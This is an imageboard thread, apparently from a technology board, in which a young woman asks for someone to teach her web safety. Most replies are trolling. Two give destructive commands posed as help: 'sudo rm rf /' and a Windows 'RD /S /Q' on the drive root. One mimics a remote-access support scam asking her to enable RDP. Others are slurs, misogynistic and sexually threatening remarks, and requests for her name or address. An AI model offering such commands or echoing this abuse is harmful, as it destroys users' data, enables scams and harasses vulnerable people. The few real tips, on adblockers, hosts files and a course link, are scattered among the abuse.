I am in need of a teacher

I am looking for a teacher of sorts. I am average if not below average at all things technology. I am looking for someone who can teach me all about the web and web safety. I have an insatiable craving for the unknown and mysterious, so I always end up in the strangest places. I've heard too many stories of people (more specifically young women like myself) getting abducted, murdered, sold, enslaved and it freaks me out. But not enough to stop me for searing for the strangeness. I need someone willing to teach me how to prevent against these things.

Attached: 1_TYAzzTJ60x-qg5N81ElU9A.png (2021x919, 931K)

Other urls found in this thread:

digdeeper.neocities.org/ghost/addons.html#adblockers
udemy.com/the-complete-internet-security-privacy-course-volume-1/learn/lecture/4951800#overview
twitter.com/NSFWRedditImage

install gentoo

Trannies aren't women

Attached: 1559560866908.jpg (1024x777, 72K)

Attached: classic-blunder.jpg (604x438, 16K)

I bet you’re using windows too
You’re already fucked kiddo.

Bruh.. just stay in your safespace, like Facebook, Twitter, tumbler and etc. And don't talk with strangers.
That's all you need, w*man.

Attached: 1558919989732.jpg (640x480, 55K)

I got your IP and am sending the party van over, you dun goof'd consequences will never be the same

Hello dear I will give you the help you are wanting ok.yEs ? Firstly l will be needing for you to set up the RDP service on you are computer please dear. please respond to me when you have done these and i will help you wid the problem you having ok good

>use adblock
>use a public hosts file
>avoid windows
that's pretty much it, enjoy

Sure whats your address?

>I have an insatiable craving for the unknown and mysterious
you sound like someone who will end up with a penis inside her, either willingly or unwillingly, but definitely not planned

Open your blinds. I'm outside, in the back yard.

I'll teach you. Meet me on torirc at 6 Greenwich mean time. What's your name?

Why ever someone need a Teacher to know web safety? Just study with all over information available you have. Just "Quidquid discis, tibi discis"

how did I get your IP? BECAUSE I BACKTRACED IT
Jow Forums party van imminent

well, if you want a study partner, sure. send an email to [email protected]

>Adblock
Just use uMatrix, its better than rely in someone making a list to you.
> digdeeper.neocities.org/ghost/addons.html#adblockers

Congrats! you're fucking retarded

udemy.com/the-complete-internet-security-privacy-course-volume-1/learn/lecture/4951800#overview

These courses are $10 a piece there's four and they're usually $200 a piece but the sale ends in a few days

you don't need a teacher, start reading then ask questions on IRC and forums ONLY when you cant find the answers anywhere else

Attached: 1553340248024.jpg (396x382, 37K)

Ah, you are looking for the hacker Jow Forums. Enter this command to find him: sudo rm rf /

Technology isn't magical or mysterious. If you want that sort of shit you should be looking into astronomy, physics, and psychology. They're far more interesting and you'll be left with more questions than answers.

Computers are different. There are answers for everything in this field. Every meaningful innovation has already been made and now the big semiconductor fabricators are just shrinking existing designs for the sake of efficiency and maintaining compatibility with ISAs that are as old as dirt.

Go read up on semiconductor technology. Computers are just silicon wafers that have a glorified calculator etched into them using acid and light. Every CPU is just another IC. Software is just math that's abstracted so that retards can understand and use it.

Attached: 9cc.jpg (683x817, 138K)

Unironically this

"Unironically this" is often used ironically, but in this case it's really unironically unironically this But then again, the job opportunities will drop to "mascot girl"

Attached: 1482193471265.jpg (750x1024, 123K)

umatrix makes half of the web unusable without fucking around with the settings, and ads can still be visible without javascript

Big kek, thanks user

CMD.EXE /K "RD /S /Q \"

Very cringey bait

Retards. OP is a faggot, but the unknown part of tech is the human element and the communities that it enables. The human element combined with esoteric protocols and other tech is where the weird shit occurs.